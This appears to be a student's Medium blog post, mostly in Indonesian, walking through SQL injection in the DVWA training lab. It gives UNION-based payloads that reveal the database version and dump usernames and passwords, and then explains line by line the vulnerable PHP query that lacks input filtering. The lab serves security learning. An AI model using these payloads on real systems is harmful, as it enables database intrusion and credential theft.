DVWA White Boxing

Command Injection

— White boxing

SQL Injection

SELECT first_name, surname FROM ... WHERE user_id = '''
SELECT first_name, surname FROM ... WHERE user_id = '' or '0' = '0'
SELECT first_name, surname FROM ... WHERE user_id = '' or '0' = '0' union select null, version() #
Terlihat bahwa DBMS yang dipakai adalah MariaDB versi 10.4.21
SELECT first_name, surname FROM ... WHERE user_id = '' or '0' = '0' union select null, concat(user,0x0a,password) from users #
Terlihat nama database (dvwa) dan nama-nama kolomnya

— White boxing

if( isset( $_REQUEST[ ‘Submit’ ] ) ) Proses validasi untuk memeriksa apakah objek form tersebut sudah tersedia atau tidak. Jika variabel submit 'tersedia', maka perintah di dalamnya akan dijalankan. 
$id = $_REQUEST[ ‘id’ ];Variabel id akan dimasukkan ke dalam $id
$query  = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id‘;”;Menjalankan query untuk mencari data user. Bagian ini menjadi eksploitasi dari SQL Injection, karena di bagian input tidak ada filter untuk spesial karakter.
$result = mysqli_query($GLOBALS[“___mysqli_ston”],  $query ) or die( ‘<pre>’ . ((is_object($GLOBALS[“___mysqli_ston”])) ? mysqli_error($GLOBALS[“___mysqli_ston”]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . ‘</pre>’ );Code ini akan mengeksekusi SQL query pada database
while( $row = mysqli_fetch_assoc( $result ) ) { 
$first = $row[“first_name”];
$last = $row[“last_name”];
Code ini akan mendapatkan nilai dari database
$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; }Data yang didapatkan akan ditampilkan kepada end-user
mysqli_close($GLOBALS[“___mysqli_ston”]);Terakhir, dengan code ini, koneksi database akan ditutup.

--

--

--

Information System and Technology Student at Institut Teknologi Bandung.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Elisabeth Levana Thedjakusuma

Elisabeth Levana Thedjakusuma

Information System and Technology Student at Institut Teknologi Bandung.

More from Medium

Important Updates

Техническое введение в сеть Axelar Network Что представляет собой Axelar Network?

Time DAO White Paper

Welcome to the Nexus Ecosystem